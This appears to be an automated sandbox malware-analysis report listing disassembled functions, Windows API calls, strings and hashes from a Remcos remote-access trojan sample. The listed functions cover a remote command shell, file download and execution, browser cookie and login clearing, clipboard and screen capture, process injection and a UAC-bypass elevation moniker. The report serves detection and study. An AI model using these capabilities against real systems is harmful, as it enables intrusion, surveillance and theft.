                                                        • String ID:
                                                        • API String ID: 2279764990-0
                                                        • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                        • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                        • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                        • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                        Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                        • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                        • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                        • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                        Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                        • String ID:
                                                        • API String ID: 806969131-0
                                                        • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                        • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                        • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                        • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                        Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                        • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                        • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                        • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF

                                                        Non-executed Functions

                                                        Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                          • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                          • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                          • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                        • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                          • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                          • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                          • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                          • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                        • Sleep.KERNEL32(000007D0), ref: 00408733
                                                        • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                          • Part of subcall function 0041CA73: SystemParametersInfoW.USER32 ref: 0041CB68
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                        • API String ID: 1067849700-181434739
                                                        • Opcode ID: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                        • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                        • Opcode Fuzzy Hash: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                        • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                        Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                        • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                        • API String ID: 2994406822-18413064
                                                        • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                        • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                        • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                        • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                        Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                          • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                          • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                        • OpenMutexA.KERNEL32 ref: 00412181
                                                        • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                        • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                        • API String ID: 3018269243-13974260
                                                        • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                        • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                        • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                        • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                        Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                        • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                        • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                        • API String ID: 1164774033-3681987949
                                                        • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                        • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                        • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                        • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                        Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32 ref: 004168FD
                                                        • EmptyClipboard.USER32 ref: 0041690B
                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                        • GlobalLock.KERNEL32 ref: 00416934
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                        • SetClipboardData.USER32 ref: 00416973
                                                        • CloseClipboard.USER32 ref: 00416990
                                                        • OpenClipboard.USER32 ref: 00416997
                                                        • GetClipboardData.USER32 ref: 004169A7
                                                        • GlobalLock.KERNEL32 ref: 004169B0
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                        • CloseClipboard.USER32 ref: 004169BF
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                        • String ID: !D@
                                                        • API String ID: 3520204547-604454484
                                                        • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                        • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                        • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                        • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                        Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                        • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                        • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                        • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$File$FirstNext
                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 3527384056-432212279
                                                        • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                        • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                        • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                        • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                        Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0041A04A
                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                        • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                        • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                        • API String ID: 489098229-1431523004
                                                        • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                        • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                        • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                        • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                        Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                        • API String ID: 3756808967-1743721670
                                                        • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                        • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                        • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                        • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                        Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                        • API String ID: 0-1861860590
                                                        • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                        • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                        • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                        • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                        Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0040755C
                                                        • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object_wcslen
                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                        • API String ID: 240030777-3166923314
                                                        • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                        • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                        • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                        • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                        Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                        • GetLastError.KERNEL32 ref: 0041A84C
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                        • String ID:
                                                        • API String ID: 3587775597-0
                                                        • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                        • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                        • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                        • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                        Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                        • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                        • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                        • String ID: JD$JD$JD
                                                        • API String ID: 745075371-3517165026
                                                        • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                        • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                        • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                        • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                        Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                        • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                        • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 1164774033-405221262
                                                        • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                        • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                        • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                        • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                        Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
